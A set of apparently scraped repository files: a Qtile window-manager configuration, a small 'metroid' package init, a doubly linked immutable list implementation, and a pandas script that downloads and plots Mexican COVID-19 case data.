from typing import List # noqa: F401 from libqtile import bar, layout, widget, qtile, hook from libqtile.config import Click, Drag, Group, Key, Match, Screen from libqtile.lazy import lazy import os import subprocess def window_to_previous_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index != 0: _group = _qtile.screens[_screen_index - 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index - 1) def window_to_next_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index + 1 != len(_qtile.screens): _group = _qtile.screens[_screen_index + 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index + 1) mod = "mod4" terminal = "terminator" keys = [ # Switch between windows Key([mod], "h", lazy.layout.left(), desc="Move focus to left"), Key([mod], "l", lazy.layout.right(), desc="Move focus to right"), Key([mod], "j", lazy.layout.down(), desc="Move focus down"), Key([mod], "k", lazy.layout.up(), desc="Move focus up"), Key(["mod1"], "Tab", lazy.layout.next(), desc="Move window focus to other window"), # Move windows between left/right columns or move up/down in current stack. # Moving out of range in Columns layout will create new column. Key([mod, "shift"], "h", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod, "shift"], "l", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod, "shift"], "j", lazy.layout.shuffle_down(), desc="Move window down"), Key([mod, "shift"], "k", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Left", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod], "Right", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod], "Up", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Down", lazy.layout.shuffle_down(), desc="Move window down"), # Grow windows. 
If current window is on the edge of screen and direction # will be to screen edge - window would shrink. Key([mod, "control"], "h", lazy.layout.grow_left(), desc="Grow window to the left"), Key([mod, "control"], "l", lazy.layout.grow_right(), desc="Grow window to the right"), Key([mod, "control"], "j", lazy.layout.grow_down(), desc="Grow window down"), Key([mod, "control"], "k", lazy.layout.grow_up(), desc="Grow window up"), # xmonadtall Key([mod, "control"], "h", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "l", lazy.layout.grow(), desc="Grow window"), Key([mod, "control"], "j", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "k", lazy.layout.grow(), desc="Grow window"), Key([mod], "n", lazy.layout.normalize(), desc="Reset all window sizes"), Key([mod, "control"], "space", lazy.window.toggle_floating(), desc="Toggle floating"), # Switch between monitors Key([mod, "shift"], "Left", lazy.function(window_to_next_screen), desc="Move window to the next monitor"), Key([mod, "shift"], "Right", lazy.function(window_to_previous_screen), desc="Move window to the previous monitor"), # Toggle between split and unsplit sides of stack. 
# Split = all windows displayed # Unsplit = 1 window displayed, like Max layout, but still with # multiple stack panes Key([mod, "shift"], "Return", lazy.layout.toggle_split(), desc="Toggle between split and unsplit sides of stack"), Key([mod], "t", lazy.spawn(terminal), desc="Launch terminal"), # Toggle between different layouts as defined below Key([mod], "Tab", lazy.next_layout(), desc="Toggle between layouts"), Key(["mod1"], "F4", lazy.window.kill(), desc="Kill focused window"), Key([mod, "control"], "r", lazy.restart(), desc="Restart Qtile"), Key(["control", 'mod1'], 'Delete', lazy.shutdown(), desc="Shutdown Qtile"), Key([mod], "r", lazy.spawncmd(), desc="Spawn a command using a prompt widget"), # Control Qtile Key([mod], 'semicolon', lazy.spawn('lock'), desc="Lock Qtile"), Key([mod], 'd', lazy.screen.toggle_group('Desktop'), desc="Show Desktop"), Key(["control", "shift"], "Escape", lazy.spawn("gnome-system-monitor"), desc="Launch system monitor"), # Launch applications Key(["control"], "space", lazy.spawn("dmenu_run", shell=True), desc="Launch dmenu"), Key([mod], "e", lazy.spawn("nautilus"), desc="Launch nautilus"), Key([mod], "b", lazy.spawn("google-chrome"), desc="Launch google chrome"), Key([mod], "KP_Left", lazy.spawn("netease-cloud-music"), desc="Launch netease cloud music"), # Just for test Key([mod], "a", lazy.group['Desktop'].toscreen(0)) ] _group_names = [ ("Major", {'layout': ['xmonadtall', 'max']}), ("Minor", {'layout': ['columns', 'max']}), ("Desktop", {'layout': 'columns'}) ] groups = [Group(name, **kwargs) for name, kwargs in _group_names] for i, (name, kwargs) in enumerate(_group_names, 1): keys.append(Key([mod], str(i), lazy.group[name].toscreen())) # Switch to another group keys.append(Key([mod, "shift"], str(i), lazy.window.togroup( name))) # Send current window to another group _layout_theme = { "border_width": 1, "margin": 5, "border_focus": "#ff66cc", "border_normal": "#66ccff" } layouts = [ layout.MonadTall( align=1, **_layout_theme ), 
layout.Max(), layout.Columns( # fair=True, insert_position=1, **_layout_theme ), # layout.Bsp( # grow_amount=2, # **_layout_theme # ), # Try more layouts by unleashing below layouts. # layout.Tile(), # layout.Stack(num_stacks=2), # layout.Slice(), # layout.Matrix(), # layout.MonadWide(), # layout.RatioTile(), # layout.TreeTab(), # layout.VerticalTile(), # layout.Zoomy(), ] colors = [["#282c34", "#282c34"], # panel background ["#434758", "#434758"], # background for current screen tab ["#ffffff", "#ffffff"], # font color for group names ["#ff5555", "#ff5555"], # border line color for current tab ["#8d62a9", "#8d62a9"], # border line color for other tab and odd widgets ["#668bd7", "#668bd7"], # color for the even widgets ["#e1acff", "#e1acff"]] # window name widget_defaults = dict( font='sans', fontsize=12, padding=3, ) extension_defaults = widget_defaults.copy() screens = [ Screen( top=bar.Bar( [ widget.CurrentLayout(), widget.GroupBox(), widget.WindowName(), ], 24 ), ), Screen( top=bar.Bar( [ widget.Sep( linewidth=0, padding=6, foreground=colors[2], background=colors[0] ), widget.Image( filename="~/.config/qtile/logo.png", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn("dmenu_run")} ), widget.CurrentLayout(), widget.GroupBox(), # widget.Prompt(), widget.WindowName(), # widget.Chord( # chords_colors={ # 'launch': ("#ff0000", "#ffffff"), # }, # name_transform=lambda name: name.upper(), # ), widget.TextBox( "Welcome, ariseus.", foreground="#ff66cc", mouse_callbacks={"Button1": lambda: qtile.cmd_spawn("waw")} ), widget.TextBox( text=" 🌡", padding=2, fontsize=11 ), widget.ThermalSensor( threshold=90, padding=5 ), widget.TextBox( text=" 🖬", padding=0, fontsize=14 ), widget.Memory( mouse_callbacks={'Button1': lambda: qtile.cmd_spawn( terminal + ' -e bashtop')}, measure_mem='G', padding=5 ), widget.TextBox( text='Network:', ), widget.Net( interface="enp6s0", format='{down} ↓↑ {up}' ), # widget.TextBox( # text=" Vol:", # padding=0 # ), # widget.Volume( # padding=5 # 
), widget.Systray(), widget.Clock(format='%Y/%m/%d %a %I:%M %p'), # widget.QuickExit(), ], 24, ), ), ] # Drag floating layouts. mouse = [ Drag([mod], "Button1", lazy.window.set_position_floating(), start=lazy.window.get_position()), # Drag([mod], "Button3", lazy.window.set_size_floating(), # start=lazy.window.get_size()), # Click([mod], "Button2", lazy.window.bring_to_front()) ] dgroups_key_binder = None dgroups_app_rules = [] # type: List main = None # WARNING: this is deprecated and will be removed soon follow_mouse_focus = False bring_front_click = False cursor_warp = False floating_layout = layout.Floating(float_rules=[ # Run the utility of `xprop` to see the wm class and name of an X client. *layout.Floating.default_float_rules, Match(wm_class='confirmreset'), # gitk Match(wm_class='makebranch'), # gitk Match(wm_class='maketag'), # gitk Match(wm_class='ssh-askpass'), # ssh-askpass Match(title='branchdialog'), # gitk Match(title='pinentry'), # GPG key password entry ]) auto_fullscreen = True focus_on_window_activation = "smart" # XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this # string besides java UI toolkits; you can see several discussions on the # mailing lists, GitHub issues, and other WM documentation that suggest setting # this string if your java app doesn't work correctly. We may as well just lie # and say that we're a working one by default. # # We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in # java that happens to be on java's whitelist. wmname = "LG3D" @hook.subscribe.startup_once def start_once(): _home = os.path.expanduser('~') subprocess.call([_home + '/.config/autostart.sh']) @hook.subscribe.startup_complete def start(): lazy.group['Major'].toscreen(1)
<filename>.config/qtile/config.py # Copyright (c) 2010 <NAME> # Copyright (c) 2010, 2014 dequis # Copyright (c) 2012 <NAME> # Copyright (c) 2012-2014 <NAME> # Copyright (c) 2012 <NAME> # Copyright (c) 2013 horsik # Copyright (c) 2013 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
from typing import List # noqa: F401 from libqtile import bar, layout, widget, qtile, hook from libqtile.config import Click, Drag, Group, Key, Match, Screen from libqtile.lazy import lazy import os import subprocess def window_to_previous_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index != 0: _group = _qtile.screens[_screen_index - 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index - 1) def window_to_next_screen(_qtile): _screen_index = _qtile.screens.index(_qtile.current_screen) if _screen_index + 1 != len(_qtile.screens): _group = _qtile.screens[_screen_index + 1].group.name _qtile.current_window.togroup(_group) _qtile.focus_screen(_screen_index + 1) mod = "mod4" terminal = "terminator" keys = [ # Switch between windows Key([mod], "h", lazy.layout.left(), desc="Move focus to left"), Key([mod], "l", lazy.layout.right(), desc="Move focus to right"), Key([mod], "j", lazy.layout.down(), desc="Move focus down"), Key([mod], "k", lazy.layout.up(), desc="Move focus up"), Key(["mod1"], "Tab", lazy.layout.next(), desc="Move window focus to other window"), # Move windows between left/right columns or move up/down in current stack. # Moving out of range in Columns layout will create new column. Key([mod, "shift"], "h", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod, "shift"], "l", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod, "shift"], "j", lazy.layout.shuffle_down(), desc="Move window down"), Key([mod, "shift"], "k", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Left", lazy.layout.shuffle_left(), desc="Move window to the left"), Key([mod], "Right", lazy.layout.shuffle_right(), desc="Move window to the right"), Key([mod], "Up", lazy.layout.shuffle_up(), desc="Move window up"), Key([mod], "Down", lazy.layout.shuffle_down(), desc="Move window down"), # Grow windows. 
If current window is on the edge of screen and direction # will be to screen edge - window would shrink. Key([mod, "control"], "h", lazy.layout.grow_left(), desc="Grow window to the left"), Key([mod, "control"], "l", lazy.layout.grow_right(), desc="Grow window to the right"), Key([mod, "control"], "j", lazy.layout.grow_down(), desc="Grow window down"), Key([mod, "control"], "k", lazy.layout.grow_up(), desc="Grow window up"), # xmonadtall Key([mod, "control"], "h", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "l", lazy.layout.grow(), desc="Grow window"), Key([mod, "control"], "j", lazy.layout.shrink(), desc="Shrink window"), Key([mod, "control"], "k", lazy.layout.grow(), desc="Grow window"), Key([mod], "n", lazy.layout.normalize(), desc="Reset all window sizes"), Key([mod, "control"], "space", lazy.window.toggle_floating(), desc="Toggle floating"), # Switch between monitors Key([mod, "shift"], "Left", lazy.function(window_to_next_screen), desc="Move window to the next monitor"), Key([mod, "shift"], "Right", lazy.function(window_to_previous_screen), desc="Move window to the previous monitor"), # Toggle between split and unsplit sides of stack. 
# Split = all windows displayed # Unsplit = 1 window displayed, like Max layout, but still with # multiple stack panes Key([mod, "shift"], "Return", lazy.layout.toggle_split(), desc="Toggle between split and unsplit sides of stack"), Key([mod], "t", lazy.spawn(terminal), desc="Launch terminal"), # Toggle between different layouts as defined below Key([mod], "Tab", lazy.next_layout(), desc="Toggle between layouts"), Key(["mod1"], "F4", lazy.window.kill(), desc="Kill focused window"), Key([mod, "control"], "r", lazy.restart(), desc="Restart Qtile"), Key(["control", 'mod1'], 'Delete', lazy.shutdown(), desc="Shutdown Qtile"), Key([mod], "r", lazy.spawncmd(), desc="Spawn a command using a prompt widget"), # Control Qtile Key([mod], 'semicolon', lazy.spawn('lock'), desc="Lock Qtile"), Key([mod], 'd', lazy.screen.toggle_group('Desktop'), desc="Show Desktop"), Key(["control", "shift"], "Escape", lazy.spawn("gnome-system-monitor"), desc="Launch system monitor"), # Launch applications Key(["control"], "space", lazy.spawn("dmenu_run", shell=True), desc="Launch dmenu"), Key([mod], "e", lazy.spawn("nautilus"), desc="Launch nautilus"), Key([mod], "b", lazy.spawn("google-chrome"), desc="Launch google chrome"), Key([mod], "KP_Left", lazy.spawn("netease-cloud-music"), desc="Launch netease cloud music"), # Just for test Key([mod], "a", lazy.group['Desktop'].toscreen(0)) ] _group_names = [ ("Major", {'layout': ['xmonadtall', 'max']}), ("Minor", {'layout': ['columns', 'max']}), ("Desktop", {'layout': 'columns'}) ] groups = [Group(name, **kwargs) for name, kwargs in _group_names] for i, (name, kwargs) in enumerate(_group_names, 1): keys.append(Key([mod], str(i), lazy.group[name].toscreen())) # Switch to another group keys.append(Key([mod, "shift"], str(i), lazy.window.togroup( name))) # Send current window to another group _layout_theme = { "border_width": 1, "margin": 5, "border_focus": "#ff66cc", "border_normal": "#66ccff" } layouts = [ layout.MonadTall( align=1, **_layout_theme ), 
layout.Max(), layout.Columns( # fair=True, insert_position=1, **_layout_theme ), # layout.Bsp( # grow_amount=2, # **_layout_theme # ), # Try more layouts by unleashing below layouts. # layout.Tile(), # layout.Stack(num_stacks=2), # layout.Slice(), # layout.Matrix(), # layout.MonadWide(), # layout.RatioTile(), # layout.TreeTab(), # layout.VerticalTile(), # layout.Zoomy(), ] colors = [["#282c34", "#282c34"], # panel background ["#434758", "#434758"], # background for current screen tab ["#ffffff", "#ffffff"], # font color for group names ["#ff5555", "#ff5555"], # border line color for current tab ["#8d62a9", "#8d62a9"], # border line color for other tab and odd widgets ["#668bd7", "#668bd7"], # color for the even widgets ["#e1acff", "#e1acff"]] # window name widget_defaults = dict( font='sans', fontsize=12, padding=3, ) extension_defaults = widget_defaults.copy() screens = [ Screen( top=bar.Bar( [ widget.CurrentLayout(), widget.GroupBox(), widget.WindowName(), ], 24 ), ), Screen( top=bar.Bar( [ widget.Sep( linewidth=0, padding=6, foreground=colors[2], background=colors[0] ), widget.Image( filename="~/.config/qtile/logo.png", mouse_callbacks={ "Button1": lambda: qtile.cmd_spawn("dmenu_run")} ), widget.CurrentLayout(), widget.GroupBox(), # widget.Prompt(), widget.WindowName(), # widget.Chord( # chords_colors={ # 'launch': ("#ff0000", "#ffffff"), # }, # name_transform=lambda name: name.upper(), # ), widget.TextBox( "Welcome, ariseus.", foreground="#ff66cc", mouse_callbacks={"Button1": lambda: qtile.cmd_spawn("waw")} ), widget.TextBox( text=" 🌡", padding=2, fontsize=11 ), widget.ThermalSensor( threshold=90, padding=5 ), widget.TextBox( text=" 🖬", padding=0, fontsize=14 ), widget.Memory( mouse_callbacks={'Button1': lambda: qtile.cmd_spawn( terminal + ' -e bashtop')}, measure_mem='G', padding=5 ), widget.TextBox( text='Network:', ), widget.Net( interface="enp6s0", format='{down} ↓↑ {up}' ), # widget.TextBox( # text=" Vol:", # padding=0 # ), # widget.Volume( # padding=5 # 
), widget.Systray(), widget.Clock(format='%Y/%m/%d %a %I:%M %p'), # widget.QuickExit(), ], 24, ), ), ] # Drag floating layouts. mouse = [ Drag([mod], "Button1", lazy.window.set_position_floating(), start=lazy.window.get_position()), # Drag([mod], "Button3", lazy.window.set_size_floating(), # start=lazy.window.get_size()), # Click([mod], "Button2", lazy.window.bring_to_front()) ] dgroups_key_binder = None dgroups_app_rules = [] # type: List main = None # WARNING: this is deprecated and will be removed soon follow_mouse_focus = False bring_front_click = False cursor_warp = False floating_layout = layout.Floating(float_rules=[ # Run the utility of `xprop` to see the wm class and name of an X client. *layout.Floating.default_float_rules, Match(wm_class='confirmreset'), # gitk Match(wm_class='makebranch'), # gitk Match(wm_class='maketag'), # gitk Match(wm_class='ssh-askpass'), # ssh-askpass Match(title='branchdialog'), # gitk Match(title='pinentry'), # GPG key password entry ]) auto_fullscreen = True focus_on_window_activation = "smart" # XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this # string besides java UI toolkits; you can see several discussions on the # mailing lists, GitHub issues, and other WM documentation that suggest setting # this string if your java app doesn't work correctly. We may as well just lie # and say that we're a working one by default. # # We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in # java that happens to be on java's whitelist. wmname = "LG3D" @hook.subscribe.startup_once def start_once(): _home = os.path.expanduser('~') subprocess.call([_home + '/.config/autostart.sh']) @hook.subscribe.startup_complete def start(): lazy.group['Major'].toscreen(1)
en
0.745192
# Copyright (c) 2010 <NAME> # Copyright (c) 2010, 2014 dequis # Copyright (c) 2012 <NAME> # Copyright (c) 2012-2014 <NAME> # Copyright (c) 2012 <NAME> # Copyright (c) 2013 horsik # Copyright (c) 2013 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # noqa: F401 # Switch between windows # Move windows between left/right columns or move up/down in current stack. # Moving out of range in Columns layout will create new column. # Grow windows. If current window is on the edge of screen and direction # will be to screen edge - window would shrink. # xmonadtall # Switch between monitors # Toggle between split and unsplit sides of stack. 
# Split = all windows displayed # Unsplit = 1 window displayed, like Max layout, but still with # multiple stack panes # Toggle between different layouts as defined below # Control Qtile # Launch applications # Just for test # Switch to another group # Send current window to another group # fair=True, # layout.Bsp( # grow_amount=2, # **_layout_theme # ), # Try more layouts by unleashing below layouts. # layout.Tile(), # layout.Stack(num_stacks=2), # layout.Slice(), # layout.Matrix(), # layout.MonadWide(), # layout.RatioTile(), # layout.TreeTab(), # layout.VerticalTile(), # layout.Zoomy(), # panel background # background for current screen tab # font color for group names # border line color for current tab # border line color for other tab and odd widgets # color for the even widgets # window name # widget.Prompt(), # widget.Chord( # chords_colors={ # 'launch': ("#ff0000", "#ffffff"), # }, # name_transform=lambda name: name.upper(), # ), # widget.TextBox( # text=" Vol:", # padding=0 # ), # widget.Volume( # padding=5 # ), # widget.QuickExit(), # Drag floating layouts. # Drag([mod], "Button3", lazy.window.set_size_floating(), # start=lazy.window.get_size()), # Click([mod], "Button2", lazy.window.bring_to_front()) # type: List # WARNING: this is deprecated and will be removed soon # Run the utility of `xprop` to see the wm class and name of an X client. # gitk # gitk # gitk # ssh-askpass # gitk # GPG key password entry # XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this # string besides java UI toolkits; you can see several discussions on the # mailing lists, GitHub issues, and other WM documentation that suggest setting # this string if your java app doesn't work correctly. We may as well just lie # and say that we're a working one by default. # # We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in # java that happens to be on java's whitelist.
1.729084
2
metroid/__init__.py
Bryhn-Bjolgerud/metroid
0
6628958
from metroid.config import settings if settings.worker_type == 'celery': from metroid.celery import MetroidTask # noqa F401 from metroid.publish import publish_event # noqa F401 __version__ = '1.1.0' default_app_config = 'metroid.apps.MetroidConfig'
from metroid.config import settings if settings.worker_type == 'celery': from metroid.celery import MetroidTask # noqa F401 from metroid.publish import publish_event # noqa F401 __version__ = '1.1.0' default_app_config = 'metroid.apps.MetroidConfig'
uz
0.389047
# noqa F401 # noqa F401
1.328532
1
src/funky_collections/immutable.py
erinxocon/funky-collections
0
6628959
<gh_stars>0 import collections from typing import Any, Generator, List, Optional, Sequence, Union from .abc import DoublyLinkedList from .nodes import ImmutableListNode class ImmutableFixedList(DoublyLinkedList, collections.abc.Sequence): __slots__ = "_max_len" def __init__(self, max_len: int = 0, seq: Sequence = ()) -> None: if max_len <= 0: raise ValueError("Max lenth must be more than 0") super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None self._max_len = max_len try: for val in seq[0 : self._max_len]: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") @property def max_len(self) -> int: return self._max_len def append_left(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 else: raise ValueError("List full!") def append_right(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 else: raise ValueError("List full!") def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: 
node.next_node.previous_node = node.previous_node return data def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(max_len=self._max_len, seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice") class ImmutableList(DoublyLinkedList, collections.abc.Sequence): def __init__(self, seq: Sequence = ()) -> None: super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None try: for val in seq: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") def append_left(self, value: Any) -> None: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 def append_right(self, value: Any) -> None: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data 
def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice")
import collections from typing import Any, Generator, List, Optional, Sequence, Union from .abc import DoublyLinkedList from .nodes import ImmutableListNode class ImmutableFixedList(DoublyLinkedList, collections.abc.Sequence): __slots__ = "_max_len" def __init__(self, max_len: int = 0, seq: Sequence = ()) -> None: if max_len <= 0: raise ValueError("Max lenth must be more than 0") super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None self._max_len = max_len try: for val in seq[0 : self._max_len]: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") @property def max_len(self) -> int: return self._max_len def append_left(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 else: raise ValueError("List full!") def append_right(self, value: Any) -> None: if self._size < self._max_len: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 else: raise ValueError("List full!") def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: 
node.next_node.previous_node = node.previous_node return data def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(max_len=self._max_len, seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice") class ImmutableList(DoublyLinkedList, collections.abc.Sequence): def __init__(self, seq: Sequence = ()) -> None: super().__init__() self._head: Optional[ImmutableListNode] = None self._tail: Optional[ImmutableListNode] = None try: for val in seq: node = ImmutableListNode(val, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 except TypeError: raise TypeError("seq must be a sequence object") def append_left(self, value: Any) -> None: node = ImmutableListNode(value, None, self._head) if self._tail is None: self._tail = node self._head = node self._size += 1 def append_right(self, value: Any) -> None: node = ImmutableListNode(value, self._tail, None) if self._head is None: self._head = node self._tail = node self._size += 1 def pop_left(self) -> Any: if self._head is None: raise ValueError("List Empty!") node = self._head data = node.data self._head = node.next_node if self._tail is node: self._tail = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data def pop_right(self) -> Any: if self._tail is None: raise ValueError("List Empty!") node = self._tail data = node.data self._tail = node.previous_node if self._head is node: self._head = None self._size -= 1 if node.previous_node is not None: node.previous_node.next_node = node.next_node if node.next_node is not None: node.next_node.previous_node = node.previous_node return data 
def __getitem__(self, index: Union[slice, int]) -> Any: if isinstance(index, slice): if index.start == index.stop == index.step: return self else: _slice = index.indices(len(self)) sliced = [self[i] for i in range(*_slice)] return self._from_sequence(seq=sliced) elif isinstance(index, int): return self.get_node(index).data else: raise TypeError("List index must be int or slice")
none
1
2.946313
3
covid.py
pyclass-jjj/proyectos
0
6628960
import pandas as pd from os import path from datetime import datetime, timedelta class COVID: def __init__(self): self.descarga_datos() self.get_estado() #self.grafica_matplot() self.grafica_plotly() def descarga_datos(self): hoy = datetime.now() - timedelta(1) fecha = hoy.strftime("%Y%m%d") file_confirmados = f'Casos_Diarios_Estado_Nacional_Confirmados_{fecha}.csv' file_defunciones = f'Casos_Diarios_Estado_Nacional_Defunciones_{fecha}.csv' url1 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_confirmados}' url2 = f'https://datos.covid-19.conacyt.mx/Downloads/Files/{file_defunciones}' print(url1) if not path.exists(file_confirmados): df = pd.read_csv(url1) df.to_csv(file_confirmados) print(f'Archivo {file_confirmados} descargado') df = pd.read_csv(url2) df.to_csv(file_defunciones) print(f'Archivo {file_defunciones} descargado') else: print('Archivos previamente descargados') self.df_conf = pd.read_csv(file_confirmados, parse_dates=True) self.df_def = pd.read_csv(file_defunciones, parse_dates=True) def get_estado(self): estados = list(self.df_conf['nombre']) print(estados) estado = input('Seleccione un estado o Nacional (default Nacional): ') if estado is None or estado == '': self.estado = 'Nacional' else: self.estado = estado.upper() df_filtered_conf = self.df_conf.query(f"nombre == '{self.estado}'") self.data_conf = df_filtered_conf.sum()[4:] df_filtered_def = self.df_def.query(f"nombre == '{self.estado}'") self.data_def = df_filtered_def.sum()[4:] def grafica_plotly(self): pd.options.plotting.backend = "plotly" data1 = self.data_conf data2 = self.data_def data = pd.concat([data1, data2], axis=1) fig = data.plot(title=f'Contagios COVID-19 ({self.estado})', template="simple_white", labels=dict(index="Fecha", value="Cantidad", variable="")) fig.data[0].name = 'Contagios' fig.data[1].name = 'Defunciones' fig.show() def grafica_matplot(self): import matplotlib.pyplot as plt data1 = self.data_conf data2 = self.data_def plt.title(f'Contagios COVID-19 
({self.estado})') plt.xlabel(f'Fecha') plt.rc('xtick', labelsize=8) plt.xticks(fontsize=6) plt.xticks(rotation=70) plt.grid(True) plt.ticklabel_format(useOffset=False) ax = data1.plot() data2.plot(ax=ax) plt.show() covid = COVID()
